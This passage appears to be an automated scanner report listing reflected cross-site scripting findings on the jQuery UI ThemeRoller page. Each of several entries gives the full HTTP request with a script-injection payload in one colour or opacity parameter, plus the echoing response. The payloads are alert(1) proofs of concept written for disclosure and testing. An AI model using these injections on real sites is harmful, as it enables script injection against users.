r=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d851bf5"><script>alert(1)</script>5b6241fd956&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&b
...[SNIP]...

3.139. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a5c"><script>alert(1)</script>aafa9f7e456 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83a5c"><script>alert(1)</script>aafa9f7e456&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
63636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83a5c"><script>alert(1)</script>aafa9f7e456&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.140. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71047"><script>alert(1)</script>322de3bc4ee was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E671047"><script>alert(1)</script>322de3bc4ee&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E671047"><script>alert(1)</script>322de3bc4ee&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent
...[SNIP]...

3.141. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0cc"><script>alert(1)</script>05af9fa5873 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88fe0cc"><script>alert(1)</script>05af9fa5873&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88fe0cc"><script>alert(1)</script>05af9fa5873&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&bo
...[SNIP]...

3.142. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cf7"><script>alert(1)</script>bd812dcb8db was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1dfc4cf7"><script>alert(1)</script>bd812dcb8db&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1dfc4cf7"><script>alert(1)</script>bd812dcb8db&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderC
...[SNIP]...

3.143. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0062"><script>alert(1)</script>44c898d98f6 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaac0062"><script>alert(1)</script>44c898d98f6&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
d42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaac0062"><script>alert(1)</script>44c898d98f6&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.144. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99072"><script>alert(1)</script>6e4b3546877 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa99072"><script>alert(1)</script>6e4b3546877&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa99072"><script>alert(1)</script>6e4b3546877&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.145. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e233d"><script>alert(1)</script>dfa3cab4bb9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100e233d"><script>alert(1)</script>dfa3cab4bb9&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100e233d"><script>alert(1)</script>dfa3cab4bb9&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColor
...[SNIP]...

3.146. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f79f"><script>alert(1)</script>2687cae33c8 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1004f79f"><script>alert(1)</script>2687cae33c8&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1004f79f"><script>alert(1)</script>2687cae33c8&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorD
...[SNIP]...

3.147. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd3b"><script>alert(1)</script>ad29cf7f0db was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85bdd3b"><script>alert(1)</script>ad29cf7f0db&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85bdd3b"><script>alert(1)</script>ad29cf7f0db&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc
...[SNIP]...

3.148. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11622"><script>alert(1)</script>2a8698a89ee was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

